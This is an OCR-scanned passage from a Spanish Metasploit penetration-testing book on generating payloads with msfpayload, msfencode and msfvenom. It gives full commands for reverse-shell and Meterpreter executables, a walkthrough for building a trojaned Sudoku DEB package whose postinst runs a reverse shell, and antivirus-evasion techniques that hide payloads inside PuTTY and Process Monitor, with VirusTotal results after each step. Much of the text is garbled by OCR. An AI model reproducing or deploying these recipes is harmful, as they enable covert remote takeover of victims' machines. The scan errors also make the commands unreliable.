E | _/ м IE] 
Г ДУЛА Л A ОНЕ Д Е | 


| metasploit v3,7,0- release [core:3.7 арі:1.9] 
684 exploits - 355 auxiliary 
217 payloads - 27 encoders - 8 nops 


= 
t o. -«5 
"= 


КЄ, 
I 


LHOST => 192,168,1.39 { 
LPORT => 4444 

¡PAYLOAD => windows/meterpreter/reverse tcp 

[+] Started reverse handler on 192.168.1.39:4444 

[+] Starting the payload handler... 


Fig 5.21: А la escucha de sesiones inversas con msfeli, 


Cuando las víctimas ejecuten el binario en sus sistemas Windows el payload devolverá el соо 
de la máquina en la dirección IP dónde se ha configurado msfeli. En este momento el atacant 
tiene control total sobre las acciones que se pueden realizar en dicha máquina. Hay que recordaf 
que las posibilidades que ofrece Meterpreter son infinitas y pueden ser consultadas en su capítulo 
correspondiente. 


Г | | _} | 
ЕЕ ЖЕ И МИЕ O о ИЕ a NE 
RA AN NAS TIC FEI 

Е вае, ЛА 

=[ metasploit v3.7.0-release [core:3.7 арі:1.0` 
+  +»=[ 684 exploits - 355 auxiliary 
+ =- «еар 217 payloads - 27 encoders - 8 nops 


:LHOST => 192.168,1.39 

¿LPORT => 4444 

PAYLOAD => windows/meterpreter/reverse tcp 

[+] Started reverse handler on 192.168,1.39:4444 

е1 Starting the payload handler... 

:[*] Sending stage (739056 bytes) to 192.168.1.38 

[+] Meterpreter session 1 opened (192.168.1.39:4444 -> 192,169.1.38:1057) at 2012-08-21 15:21:83 
: -8400 { 


'meterpreter > рий 


¿CiMArchivos de programaWMozilla Firefox 
:meterpreter > Y 


Fig 5.22: Obtención del control total de una máquina víctima, 


Para otros sistemas operativos como GNU/Linux u OSX también se pueden crear ejecutables del 
manera sencilla e intuitiva con ms/payload. El proceso es sencillo se indica un payload para estos 
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sistemas operativos, como por ejemplo linux/86/shell/reverse_tcp u osx/x8ó/shell bind tep, y 
automáticamente el ejecutable que se crea con msjpayload está preparado para este tipo de sistemas 
operativos. 


rpot@root:-# msfpayload linux/x86/shell/reverse tcp lhost=192,168.1.39 lport=4444 X > linux 
Created by msfpayload (http://www. metasploit. com}. | 
Payload: linux/x86/shell/reverse tcp 

Length: 50 7 

Options: (“lhost"=>"192,168.1.39", "lpori"=>="4444") 

raotároot:-* 15 

Resktop linux 

rovtersot:-+* chmod +x linux 

rootareoi:-% ./ linux 


Fig 5.23: Generación de archivo binario para sistemas GNU/Linux. 


En el ejemplo del binario para sistemas Linux se puede visualizar como se ha utilizado la misma 
máquina para realizar la explotación. Como se ha hecho en el resto de ejemplos tendría mayor 
sentido si se realiza sobre máquinas remotas sobre las que по se dispone de control. ` 


payload => linux/x86/shel/reverse_tcp 
thost => 192.168,1,39 і 
lport => 4444 { 
[+] Started reverse handler on 192,168.1.39:4444 

1*] Starting the payload handler... 

[+] Sending stage (36 bytes) to 192.168,1,39 л i 

[+] Command shell session 1 opened (192.168.1.39:4444 -> 192.168.1.39:52310) at 2012-08-21 21:48 
:35 -0480 


Fig 5.24: Obtención de una shell inversa de un sistema operativo GNU/Linux. 


PoC: Creación de un paquete DEB malicioso 
En esta prueba de concepto se creará un fichero DEB malicioso. Hay que tener en cuenta que 
se ejecutará tanto la aplicación real como el payload que se іпуесіе en el paquete, por lo que la 
aplicación rea! debe ser alguna que llame la atención de la víctima. 


Este método es criticado en Internet por los mayores defensores de sistemas operativos GNU/Linux, 
ya que indican que el paquete no está firmado ni verificado y que los usuarios no lo ejecutarían. La 
realidad no es así, los usuarios también descargan archivos de Internet y ejecutan cualquier tipo de 
software con orígenes desconocidos. Es por esta razón que este método puede funcionar en gran 
cantidad de casos ya que la distribución del paquete es ciave. 


En primer lugar hay que disponer de un paquete DEB real que albergará en su interior el payload. 
Para obtener el archivo DEB se ejecutará la siguiente instrucción apt-get —download-only install 
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<nombre paquete>, Para esta prueba de concepto el paquete elegido es el juego del Sudoku el cual 
es una simple aplicación de línea de comandos que permitirá a la víctima disponer de dicho juego. 


Una vez se ha obtenido el paquete DEB se procede a crear la estructura de directorios para el paquete 
DEB manipulado о malicioso. Se llevarán a cabo las siguientes instrucciones: 
rootfroot :-1H/juegoFalso/sudokuk mv /var/ cache/ apt/ archives/ sudoku 1.0.1-3 
amd64. ае} . Ñ А 

гоог @гоос: УЙ фоепоға1 50 зоаокий dpkg ~x sudoku_1,0.1-3 amcd64. del maxeinsiali 

гоог гоо: 4 /juegofalso/sudokul mkdir makeinstall/DEBIAN 


Una vez creada ia estructura de direciorios se deben crear los ficheros de contro! del paquete DEB. 
Estos ficheros se deben ubicar en el directorio DEBIAN. El primer fichero que 58 debe crear tiene 
por nombre control. 

Package: sudokuFalso 

Version: 0.3 

Section: Games and Amusement 

Priority: optional 

Architecture: 1386 

Maintainer: Ubuntu МОТО Developers (ubuntu-=motutlists. ubuntu. com) 

Description: Un juego de sudoku 


El fichero postinst también debe ser creado en el directorio DEBIAN y contiene las acciones que se 
ejecutarán al ejecutar el paquete DEB. Para la prueba de concepto se utilizará el siguiente esqueleto. 
Hay que tener en cuenta que una vez que se crea este archivo, es recomendable asi gnarle los permisos 
755 al fichero, уа que debe ser ejecutado. 


$! /bin/sh : 
chmod 2755 /usr/games/sudokuFalso && /usr/games/sudokuFalso: & 


Una vez que se dispone de los archivos de control del paquete DEB creados y preparados se debe 
crear el binario que contiene el payload. El payload escogido para esta prueba de concepto es /imux/ 
x86/shell/reverse_tcp. 


Para crear el archivo binario se debe ejecutar la siguiente instrucción: 


msfpavload limux/x86/shell/reverse_tcp LHOST=192.168.1.39 LPORT=4444 X > trooUjuegolalso/ 
sudoku/makeinstall/usr/games/sudokuFalso. 


se puede observar que la ruta coincide con /usr/games/sudokuFalso del archivo postinst. Se puede 
entender de manera sencilla que cuando la víctima ejecute el paquete DEB y el archivo postinst sea 
ejecutado éste referencia a la ruta dónde realmente se encuentra el payload en el interior del paquete 
DEB, provocando la ejecución del código malicioso. Es altamente interesante probar distintas 
configuraciones del archivo postinst para comprobar su potencial y entender todo lo que se puede 
ejecutar y lograr con ип pensamiento maligno. 


Por último queda construir el paquete DEB malicioso, para ello se utiliza la herramienta dpkg- 
deb. La siguiente instrucción debe ser ejecutada para construir el paquete dpkg-deb —build /root! 


Metasploit para Pentesters 


Juegol'also/sudoku/makeinstall. Tras visualizar la correcta salida de esta operativa se recomienda 
cambiar el nombre del paquete DEB para que pase desapercibido. 


Antes de distribuir el paquete DEB se debe configurar, por ejemplo mediante la herramienta msfeli, 
el módulo exploit/multi/handler para recibir la shell inversa. Cuando la víctima ejecute el paquete 
DEB, estará proporcionando al atacante una shell, para gestionar y manipular la máquina remota. 


pablogpablo-VirtualBox:-S sudo dpkg -i sudokuFalso. deb 

“(Leyendo la base de datos ... 127951 Ficheros o directorios instalados actualmente.) 
Preparando para reemplazar sudokufalso B.3 (usando sudokuFalso.deb) ... 
Desempaquetando el reemplazo de sudokufalso ... 
Configurando sudokufalso (9.3) ... | 
Procesando disparadores рага man-db ,.. | 


Fig 5.25: Ejecución del paquete DEB en una distribución 5и. 


Tras la ejecución de una víctima se recibirá la sesión inversa y el control de la máquina remota. Lo 
interesante es que la víctima no nota nada extraño, уа que se puede hacer que la aplicación original 
se ejecute, por lo que aparentemente todo es correcto, | 


| | 

| ={ metasploit v3.7.0-release [core:3.7 api:1.9] 
it -- "х= 684 exploits - 395 auxiliary 

| [ 


t -- -~-= 217 payloads - 27 encoders - 8 nops | 
| 
| 


lias => 192.168.1.39 
lport => 4444 
payload => linux/x86/shell/reverse_ tep 
[+] Started reverse handler оп 192,168.1.39:4444 
[+] Starting the payload handler... о. 
[+] Sending stage (36 bytes) to 192.168.13.37 
[+] Command shell session 1 opened (192.168.1.39:4444 -> 192,158.1.37:51597) at 
2012-08-22 19:12:92 -0489 


і 
į 
¿hoami | 


Fig 5.26: Obtención de una shell inversa en una máquina Ubuntu a través de un DEB malicioso. 


Payloads Vs Antivirus 

Existe gran cantidad de información que trata la delicada relación entre los payload y los antivirus. 
La gran mayoría de antivirus detectan a gran cantidad de payload simplemente por la firma que 
proporciona la generación de archivos con este tipo de código. En la prueba de concepto realizada 
anteriormente se ha podido estudiar Ja creación de un troyano casero a través de la herramienta 
msfpaylocud. 


Esta prueba de concepto llevada al mundo real posiblemente no daría los resultados esperados ya que 
algún antivirus podría detectar fácilmente la amenaza. Como ejemplo de lo enunciado anteriormente 
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se presenta el sitio web http://www.virustotal.com en el que se puede Comprobar si el ejecutable 
creado anteriormente es detectado y además qué antivirus lo detectan. Se puede entender que dar 
este uso a un sitio como Virus Total no es el más lícito, pero hay que tener en cuenta que los atacantes 


se aprovecharán de este tipo de herramientas para conocer el grado de eficacia de su. ejecutable 
frente a los sistemas de protección. ` 


Bvirustotal 


SHAZ256: 556649а414000549с56(3ә537 14b61d955075c52(BI052dec99e82e70b6bd564 


re а жыз 


Nombre: troyano.exe 


Delecciones: 33/42 


2012-08-21 19:24:38 UTC ( hace 1 minuto ) 


Fecha de análisis: 


tt 
Маз delalles 


Fig 5.27: R 


esultados del análisis de un ejecutable con un payload. 


En la imagen se ha podido observar como la gran mayoría de los sistemas antivirus detectan la 
generación del ejecutable por defecto, con un payload Meterpreter de tipo reverse (cp y sin ninguna 
técnica de evasión aplicada. En el siguiente apartado se estudiarán métodos y técnicas para la posible 


` evasión de la detección de los antivirus. 


1. 


4. Msfencode: Evadir la detección 


Мкуепсойе es una de esas herramientas que no llaman la atención en comparación con msfbayload 
о msfeli, Pero al conocer de forma detallada las funcionalidades y posibilidades que aporta, el 


pensamiento de más de un lector cambiará. 


Msfencode es una herramienta cuyo fin es evitar que los antivirus detecten los ejecutables y payloads 
que se han ido generando en los apartados anteriores. El fin es claro, evadir el sistema de protección 
ya que como se ha visto anteriormente la mayoría de los antivirus detectan fácilmente y por firma 
los ejecutables anteriores como amenazas. 


Esta herramienta dispone de ciertos conceptos que deben ser explicados brevemente antes de entrar 
en materia, como por ejemplo ¿Qué es un encoder o codificación? ¿Por qué iterar una codificación? 
¿Existen algoritmos de codificación mejores que otros? Estas preguntas se ігар respondiendo a lo 
largo de este apartado. Para las pruebas de concepto y para poder comprobar que la herramienta está 


‚ mejorando los resultados frente a los antivirus se utilizará, como anteriormente se ha utilizado, el 


Sitio web htip://www virustotal.com. 
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Codificación con msfencode | 

Una de las mejores y más sencillas maneras de evitar ser detectado, o al menos intentarlo, por un 
sistema antivirus es utilizar msfencode para codificar el payload. En la teoría msfencode se encarga 
de modificar la apariencia del código del payload para que el antivirus no lo detecte. Al modificar І 
apariencia del código la firma de éste cambiará. 


Msfencode genera un nuevo ejecutable o archivo binario, el cual cuando la víctima lo ejecute se 
decodificará en memoria y se ejecutará el archivo real. La idea es sencilla, primero se codifica para 
evitar la detección de los antivirus, para después cuando el archivo entre en memoria decodificar y 
obtener el original y las funcionalidades de éste. 


Los codificadores o encoders disponibles en msfencode se pueden obtener ejecutando la siguiente 
instrucción msfencode —1. Hay que tener en cuenta que cada arquitectura o plataforma dispone de unos 
codificadores explícitos para ella, es decir, un encoder para una arquitectura x86 no es válido para 
una arquitectura PowerPC. Además, hay que tener en cuenta el Rank que dispone cada codificador, 
ya que indica la valoración que obtienen y el posible éxito que puede tener la codificación. 


гоої@гоої: -# msfencode -l 


ramework Encoders 


A orean areara a иет: 
AA === 


Name Rank Description 


---- rr _–СГТҒЕҒҒҒГҒЕТЯЯ 


cmd/generic_sh good Generic Shell Variable Substitution Command Encoder 
cmd/ifs Low Generic $(1FS) Substitution Command Encoder 
cad/printf_php_wq good printf(1) via PHP magic quotes Utility Command Encoder 
generic/none normal The "none" Encoder 
mipsbe/longxor normal · ХОА Encoder 
mipsle/longxor normal XOR Encoder 
php/baseð4 great PHP Base64 encoder 

I ррс/1опдхог normal PPC LongX0R Encoder 
ppc/longxor_tag normal РРС LongX0R Encoder 
sparc/longxor_tag normal SPARC DWORD XOR Encoder 
x64/xor normal XOR Encoder 
x86/alpha mixed low Alpha2 Alphanumeric Mixedcase Encoder 
x86/alpha_upper low А\рћа2 Alphanumeric Uppercase Encoder 
x86/avoid utf8_tolower manual Avoid UTFB/tolower 
x86/call4 dword хог normal Call+4 Dword ХОА Encoder 
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder 
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder 
x86/context_time manual time(2)-based Context Keyed Payload Encoder 
x86/countdown normal Single-byte XOR Countdown Encoder 


x86/fnstenv_mov normal Variable-length Fastenv/mov Dword XOR Encoder 


Fig 5.28: Listado de codificadores disponibles con msfencode. 


Para obtener ayuda sobre el uso de la herramienta se dispone del parámetro —h, el cual proporciona 
información sobre distintos usos y funcionalidades de la herramienta. 


Capítulo V. Otras msf tools 


PoC: Creación de un ejecutable codificado 
En esta primera prueba de concepto con msfencode se realizará una codificación simple y s 


+ e . E Р р . + . $ 
estudiará la mejora frente:a los antivirus. El encoder escogido para esta prucba de concepto es 
И КАНА . > . t g t i j 
x86/shikala_ga_nai, el cual es un codificador polimórfico. Su valoración es la más alta en el Rank 
proporcionado por la herramienta. | 


П 


En primer! lugar se genera el ejecutable tal y como se haría normalmente con la herramienta 
ms/payload y mediante una tubería о pipe se enlaza con la herramienta ms/encode. Hay que tener 
en cuenta que еї modo de ejecución de ms/payload que se utiliza es el modo raw, ya que insfencode 
se encargará de generar el ejecutable cuando reciba la salida de ms/payload. El parámetro е indica 
qué tipo de codificador se utilizará, mientras que el parámetro —t indica el tipo de archivo que se 
debe generar. 


pS n: at eas 


roat@root:-# msfpayload windows/meterpreter/reverse tcp lhost=192,168.1.39 (port-4444 À | msfenco 
de -e x86/shikata_ga_nai -t ехе > archivoCodificado.exe 
[+] x85/shikata_ga_nai succeeded with size 317 (iteration=1) 


Fig 5.29: Creación de un ejecutable codificado con msfencode, 


Se puede comprobar que el archivo creado es realmente un ejecutable válido para sistemas Windows 


mediante el comando file. La siguiente instrucción file <archivoCodificado.exe> devolverá que el 
archivo es PE32 executable for MS Windows. | 


ИКАН ы E › . * ч 
Por último queda estudiar los resultados que proporciona Virus Total respecto a los antivirus del 


mercado y el archivo codificado creado. Para ello, se procede a subir el archivo creado mediante 
msfencode al sitio web htp://www.virustotal.com. | 


virustotal 


SHAZ256: 771154371b377944f4206a3b3dced0417321fdab06fc76912711B5c3fa51701 | 
Narmbre: archivoCodificado. exe 
Detecciones: 28/42 


Fecha de análisis: 2012-08-23 17:37:39 UTC ( hace 1 minuto ) 


и 
Маз delallos 


Fig 5.30: Obtención de resultados de la codificación simple en Virus Total. 


En la imagen se puede visualizar como 28 de 42 antivirus han detectado el ejeculable como malicioso, 


Esto supone una mejora de 5 antivirus menos, que en la primera prueba que se realizó en la que no se 


utilizó la herramienta msfencode. A continuación se irán estudiando distintas técnicas para intentar 
disminuir la detección de los archivos generados. 


П 
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Codificación múltiple o 

Normalmente las casas de antivirus están continuamente actualizando las bases de datos de firmas 
para detectar el mayor número de aplicaciones maliciosas. La codificación múltiple permite al 
atacante iterar sobre el payload y realizar varias codificaciones. Con esta técnica se busca que las 
detecciones estáticas de los antivirus disminuyan respecto a la técnica de simple codificación. 


Г] encoder x86/shikata_ga_nai, el cual es polimórfico, permite generar distintos payloads en cada 
codificación. Es decir, es un punto a favor en la generación de firmas distintas en cada iteración del 
encoder, 


La técnica de múltiple codificación permite utilizar distintos encoders encadenados, es decir, la 
salida de uno será la entrada del siguiente. Es recomendable utilizar un alto número de iteraciones y 
distintos encoders para intentar evadir a los antivirus. 


PoC: Creación de un ejecutable multicodificado 

En esta prueba de concepto se utilizará la técnica de múltiple codificación para estudiar el número 
de antivirus que se consiguen evadir. Los tipos de codificadores que se utilizarán son x86/shikata_ 
8а паї, xS6/context_stat y x86/countdown. Estos codificadores devolverán un ejecutable el cual será 
denominado archivo MultiCodificado. exe. 


ootéraot:-4 msfpayload windows/meterpreter/reverse_ tcp Thost=192.168.1.39 1рогї=4444 R | msfenco 
le -e хвб/зћікаїа да пај -c б -t гам | msfencode -e x86/context_stet -c 3 -t raw | msfencode -e х 
16/countdovn -c 4 -t raw | msfencode -e xB6/shikata ga nai -c 6 -t ехе -o archivoMultiCodificado. 
хе 


[+} x86/context_stat succeeded with size 62 (iteration=1) 


[+] x86/context_stat succeeded with size 124 (iteration=2) 
[*] x86/context_stat succeeded with size 186 (iteration=3) 
*] x856/countdown succeeded with size 203 (iteration=1) 


{+} x86/countdown succeeded with size 220 (iteration=2) 


і 
[+] хвб/сойпїйонп succeeded with size 237 (iteration=3) | 
[ *] x86/countdown succeeded with size 254 (iteration=4) 
[*] x86/shikata ga nai succeeded with size 281 (iteration=1) 
'] x86/shikata ga nai succeeded with size 308 (iteration=2) 
[*] x86/shikata ga nai succeeded with size 335 (iteration=3) | 
| 


[+] x86/shikata_ga nai succeeded with size 362 literation=4) 


size 416 (iteration=6) 


| x36/shikata_ga паі succeeded with size 389 (iteration=5) ` 
| 


Fig 5.31: Obtención de ejecutable con la técnica de codificación múltiple. 


En primer lugar se crea mediante msfpayload el flujo en modo raw de un payload windows/ 
meterpreter/reverse_tcp. Este flujo se pasa a la herramienta msfencode el cual aplicará el encoder 
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x86/shikata_ga_nai. Mediante la utilización del parámetro —с se indica el número de iteracionesy 


_ del codificador que se deben realizar, en el ejemplo se utilizan 6. Con el parámetro —t se indica 


que la salida de msfencode será un flujo de bytes y no un formato ejecutable. La salida se pasa def 
nuevo а la herramienta msfencode que en segunda instancia utiliza el encoder x86/context_staf con 3 
iteraciones. La salida se envía otra vez a msfencode, en este caso con el codificador x86/countdown" 
con 4 iteraciones. Por último, la salida se pasa de nuevo a msfencode, para que otra vez se utilice 
el encoder x86/shikata_ga_nai con 6 iteraciónes. En la última ejecución de msfencode se utiliza е! 
parámetro —t соп exe para indicar que se debe aplicar salida en formato PE32 executable, es decir. 
un archivo ejecutable final para un sistema Windows. | 


A continuación, hay que estudiar si el número de antivirus que detectan el archivo ha mejorado o no. 
Se procede a subir el archivo a Virus Total y comprobar el número de antivirus que lo detectan y si 
se han mejorado los resultados anteriores. En este caso, no se ha obtenido mejora, ya que se obtiene 
prácticamente el mismo resultado, | 


Mvirustotal 


ЗНА256: 8е14с0602219ейе304135201115952Ь6е17 с903е375618с24е006а3943392 


Nombre: archivoMultiCodificado. exe 


Detecciones: 29/42 


Fecha de análisis: 2012-08-24 00:08:08 UTC ( hace 1 minuto ) 
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Fig 5.32: Obtención de resultados en virus total de la técnica de codificación múltiple. 


En esta técnica entra en juego la utilización de unos encoders u otros y la combinación de éstos, Es 


altamente recomendable utilizar distintas combinaciones, con distintas iteraciones e ir comprobando 
los resultados en Virus Total. 


Teoría sobre ejecutables personalizados y sigilosos 

ista técnica va un paso adelante y se basa en las plantillas para crear los ejecutables. Por defecto, 
Metasploit almacena en la ruta Ipentestlexploits/framework3/data/templates las plantillas o 
esqueletos рага la creación de ejecutables, DLLs o binarios de sistemas basados en Unix. 


La técnica que se estudiará ahora permite al atacante utilizar plantillas personalizadas, con el 
objetivo de evadir las firmas de las plantillas por defecto, las cuales normalmente están registradas 
por los antivirus. Lo que realmente se busca es utilizar un ejecutable cualquier, por ejemplo válido 
en sistemas Windows para que los antivirus no lo detecten como amenaza. Además, se codificará 
mediante el uso de algún encoder para intentar mejorar la posible evasión, 
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Para poder utilizar dicha técnica se dispone del parámetro --x en msfencode. А este parámetro se le 
debe indicar qué ejecutable se quiere usar para llevar a cabo la creación del elemento malicioso que 
contendrá el payload codificado. Por otro lado, y como una evolución de la técnica de las plantillas 
personalizadas, se dispone de la técnica de los ejecutables sigilosos. Esta técnica permite lanzar un 
thread que será el que ejecute realmente el payload, mientras que el proceso principal será la propia 
aplicación real o como se ha mencionado anteriormente la plantilla personalizada. 


Esta técnica dispone de algunos inconvenientes ya que no funciona con todos los ejecutables y 
se debe preparar y realizar un estudio previo antes de ejecutar el archivo malicioso contra una 
posible víctima. Para poder utilizar dicha técnica se dispone del parámetro -k en msfencode. Es 
un parámetro de tipo switch, es decir simplemente indicando —k, msfencode conoce la acción que 
debe realizar. Se podrá visualizar un ejemplo sencillo y claro en el apartado de las pruebas de 
concepto que implementan dichas técnicas. La técnica sigilosa debe ser puesta en prueba siempre 
con aplicaciones que dispongan de interfaz gráfica para que la víctima no sospeche de una ejecución 
extraña en su máquina. 


PoC: Creación de un ejecutable personalizado 

En la siguiente prueba de concepto se utilizará un ejecutable de Windows, el cual se utilizará como 
plantilla. La herramienta escogida para tal fin es la aplicación Process Monitor de Sysinternals, la 
cual puede ser descargada desde la siguiente URL hitp:/Hechnet.microsofl.com/es-es/sysinternals/ 
b0896645.aspx. El archivo que se generará se denominará procmonCodificado.exe. En un sistema 
Windows se visualizará con el mismo icono y con la misma información que el archivo original. 


bj procmonCodificado 
Process Monitor 
Е y Sysinternals - ne. sysinteriia. .. 


Fig 5.33: Ісопо e información sobre el ejecutable malicioso. 


- Para llevar a cabo este proceso, de nuevo se utilizan conjuntamente las herramientas ms/payload 
y msfencode. La salida de msfencode con payload windows/meterpreter/reverse_tcp se pasa а la 
herramienta msfencode que utiliza el encoder x86/shikata_ga_naicon 5 iteraciones. Con el parámetro 
—х se especifica la ruta donde está el ejecutable real de Process Monitor. Por último, se indica que 
tipo de archivo se está generando y la ruta donde se albergará el nuevo archivo ejecutable malicioso. 


rostaraot:-4 msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.39 1рогї=4444 R | msfenco 
e -e xB6/shikata ga nai -x $HOME/Procmon.exe -t exe -c 5 -o procmonCodificado.exe 
[+] x86/shikata ga паі succeeded with size 317 (iteration=1) 


e 


+] x86/shikata ga паі succeeded with size 344 (iteration=2) 
(*] x86/shikata да лаі succeeded with size 371 (iteration=3) 


[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) 


) 


Fig 5.34: Creación de ejecutable mediante el uso de la técnica de plantilla personalizada. 


*] x86/shikata ga паі succeeded with size 425 (iteration=5 
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Una vez creado el ejecutable y como en las pruebas anteriores se procede a subir el archivo a 
Virus Total y comprobar cuantos motores antivirus detectan el ejecutable. El objetivo es conseguir 
disminuir el número de antivirus que detecten el archivo como malicioso. 


SHAZE6b: - 32/48ceb06a78367 46а1с981933рас1 11656Васбсс3е5013с0350с6388е73 


Nornbre: procmonCodificado. exe 


Detecciones: 23/42 


Fecha de апаіѕіѕ. 2012-08-24 01:57:35 UTE ( hace 1 minuto } 
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Sy 
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Fig 5.35: Obtención de resultados del ejecutable con plantilla en Virus Total. 


Como se puede visualizar en los resultados, se ha conseguido mejorar la cifra de antivirus que no 
detectan el archivo como malicioso. Y se ha disminuido considerablemente la cifra respecto a la 
primera prueba que se realizó en la que no se utilizaba ningún encoder. Respecto a aquella primera 
prueba se ha conseguido evadir 10 antivirus. Habría que seguir realizando ensayos y combinaciones 
para intentar conseguir rebajar las cifras. En este caso la paciencia es un factor fundamental así como 
disponer de herramientas en Internet como Virus Total para ir probando las distintas configuraciones. 


РоС: Creación de un ejecutable personalizado y sigiloso 

En esta prueba de concepto se utilizará una plantilla personalizada, la cual ejecutará un thread donde 
realmente se ejecutará el payload. La herramienta que se utilizará dispone de interfaz gráfica para 
evitar que lá víctima sospeche que algo extrafio ocurre en su equipo. La idea es que la aplicación 
real se ejecute en primer plano, mientras que un thread ejecute el payload en la máquina víctima. 


Al crear el ejecutable, éste dispondrá del icono original de la herramienta Ригу, la cual se utilizará 
como plantilla en este caso. Además, se muestra la versión e información real de dicha aplicación. 


© puttyCodificado 
55H, Telnet and Rlogin client 
Simon Tatham 


Descripción: SSH, Telnet and Rlogin client 


Organización: Simon Tatham 
Versión del archivo: 0,62.0.0 

Fecha de creación: 24/08/2012 4:30 
Tamaño: 476 KB 


Fig 5.36: Información del ejecutable malicioso, 


Para crear dicho ejecutable se utilizarán de nuevo las herramientas ms/payload y msfencode enlazadas 
otra vez por un pipe. Msfpayload de nuevo utilizará el payload windows/meterpreter/reverse_tcp, 
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mientras que msfencode utilizará el encoder x86/shikata_ga_nai con 5 iteraciones. Como novedad 
hay que fijarse que se aplica el parámetro —К para indicar que el payload debe ser invocado en un 
(hread еп el main. De este modo se consigue que en primer plano se ejecute la aplicación gráfica, 
mientras que en segundo'plano se ejecuta el payload. Esto ayuda y mucho a que la víctima sienta que 
по hay nada extraño en la ejecución de la aplicación. Normalmente, dicha aplicación se cerrará a los 
pocos segundos, pero se ha conseguido que la víctima vea todo de manera normal. 


тутур msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.39 Tport=4444 R | msfenco 
de -t ехе -x /rovt/putty.exe -e x8§/shikata ga nai -k -c 5 -o puttyCodificado.exe 

1*] x86/sħikata ga паі succeeded with size 317 (iteration=1) 

[+] x86/shikata_ga_nai succeeded with size 344 (iteration=2) 

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) 


[+] x86/shikata_ga_nai succeeded with size 398 (iteration=4) 


[+] х86/5һіката да паі succeeded with size 425 (iteration=5) 


Fig 5.37: Creación del ejecutable con plantilla personalizada y sigiloso. 


Tras crear el archivo y codificarlo se distribuye sobre las víctimas. Cuando éstas lo ejecuten 
podrán visualizar correctamente la aplicación Purty funcionando, o aparentemente ejecutándose 
correctamente. En la imagen se puede visualizar como al ejecutar el archivo sé obtiene la pantalla 
principal de dicha aplicación. 
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Fig 5.38: Ejecución de puttyCodificado con apariencia real, 


Capítulo Y. Otras msf tools | 
lj ) 
геш A Жыз сз Солы ды 


i 
Tras ejecutar la aplicación maliciosa, fa victima visualiza correctamente dicha herramienta, pero en 


segundo plano se ha lanzado un !hread el cual está ejecutando el payload. Para demostrar esto, se hat 
preparado, mediante el uso de la herramienta msfeli, el exploit multi/handler con el fin de recibir ladl 
sesiones inversas de Meterpreter que producen las ejecuciones del archivo malicioso, En la imagen 

se puede visualizar como se obtiene una sesión de Meterpreter, lo cual otorga el control remoto de 

la máquina víctima sin levantar sospecha alguna. 


=[ metasploit v3.7.0-release [core:3.7 api:1.0] 
t -- --=[ 684 exploits - 355 auxiliary 
E -- +-=[ 217 payloads - 27 encoders - 8 nops 


thost => 192.168.1,39 

lport => 4444 

ayload => windows/meterpreter/reverse_tep 

1097 Started reverse handler on 192.168.1,39:4444 
[+] Starting the payload handler... 

[*] Sending stage (749056 bytes) to 192.168.1.3В 


[+] Meterpreter session 1 opened (192.168,1.39:4444 -> 192.168.1.38:1177) at 2012-08-23 81:42:07 
-8400 ; 


eterpreter > 


Fig 5.39: Obtención de una sesión inversa de Meterpreter mediante ejecutable sigiloso. 


Una vez que se ha demostrado cómo se obtiene una sesión de Meterpreter, mientras que el usuario 
víctima visualiza la pantalla principal de la aplicación Putty, y que además, su solución antivirus 
no detecta tal archivo como malicioso, Пера el momento de estudiar los resultados de los motores 
antivirus, Para ello, se procede a la subida del archivo a Virus Total y se analizan los resultados. 


№ virustotal 


S:A256: 7288893813406 1 defd70c1649cc917820f8h12339991 116995151 бсв91356а 


Nombre: puttyCodificado. exe 


Detecciones: 32/42 


Fecha de análisis: 


2012-08-24 02:42:51 UTC ( hace 1 minuto ) 


4? 


Más detalles 


Fig 5.40: Resultados presentados por virus total para el archivo puttyCodificado. exe. 


Los resultados reflejan, en parte, un retroceso en la evasión de algunos antivirus, Hay que tener en 
cuenta que se está dando prioridad al aspecto del archivo, antes que а la eficiencia para evadir una 


-Solución antivirus, Los resultados obtenidos se pueden comparar a los conseguidos, prácticamente, 


sin disponer de codificación, ya que la mejora ha sido mínima. 


Hay que tener en cuenta que la técnica de la plantilla personalizada sin ejecución del payload en un 
thread es más eficiente para evadir a los antivirus. Utilizando dicha técnica con el mismo ejecutable, 
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es decir la herramienta putty, pero sin el thread sigiloso se obtienen menos detecciones. Si se puede 
verificar el motor antivirus de que disponen las víctimas se puede comprobar en Virus Total si serían 
detectados o no, y en ese caso se puede elegir una u otra técnica. 


5. Msfvenom: Payload y evasión 


La aplicación msfvenom es una herramienta que apareció no hace demasiado tiempo en el framework 
de Metasploit. Esta herramienta no viene por defecto, por ejemplo, en la versión de BackTrack 5. Se 
puede conseguir, por ejemplo, en la versión BackTrack 5 R3, 


EI objetivo de esta herramienta es unir las funcionalidades de ms/puvloud y msfencode en una sola 
aplicación. Una mejora que los usuarios no tienen en cuenta en la mayoria de las ocasiones es 
la semántica de los parámetros, Es más sencillo utilizar una herramienta cuyos parámetros tienen 
semántica, como por ejemplo el caso del parámetro —p. En esta herramienta se puede utilizar un 
parámetro semántico, es decir, --payload. De esta manera, el usuario puede entender fácilmente la 
funcionalidad que la herramienta presenta. 


Msfvenom permite crear payloads para utilizar de forma independiente en los exploits que cualquier 
usuario puede crear, o se puede utilizar para crear archivos ejecutables para sistemas operativos 
como Windows, GNU/Linux u OSX. La funcionalidad es justo la misma que la que dispone la 
herramienta msípayload, salvo que estas funcionalidades pueden codificarse automáticamente con 
algún algoritmo, como puede ser x86/shikata_ga_nai o x86/countdown, entre otros. 


Beneficios del uso de msfvenom 
Los principales beneficios que aporta msfvenom a los usuarios del framework de Metasploit se 
enumeran a continuación: 


- El potencial de dos herramientas, como son msfencode y msfpayloud, se concentra en una 
sola, que además es flexible y de uso intuitivo. 


- Estandarización de este tipo de herramientas mediante el uso de msfvenom. Con esla 
aplicación el usuario dispone de un estándar para la generación de payloads y ejecutables 
maliciosos para los test de intrusión. 


- El rendimiento ha sido mejorado considerablemente. La velocidad con la que msfvenon: 
trabaja es claramente más alta que el uso de ms/payload y msfencode por separado, Esto es 
bastante lógico debido a que se evita el paso de información entré distintos procesos, y toda 
la acción es realizada por el mismo. 


- Fácil aprendizaje. Esta herramienta proporciona una interfaz intuitiva, mediante el uso de 
parámetros semánticos, con lo que un usuario sin conocimientos previos puede realizar sus 
pruebas. Para el auditor o usuario avanzado proporciona una herramienta rápida y con gran 
rendimiento. 
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Opciones de msfvenom 

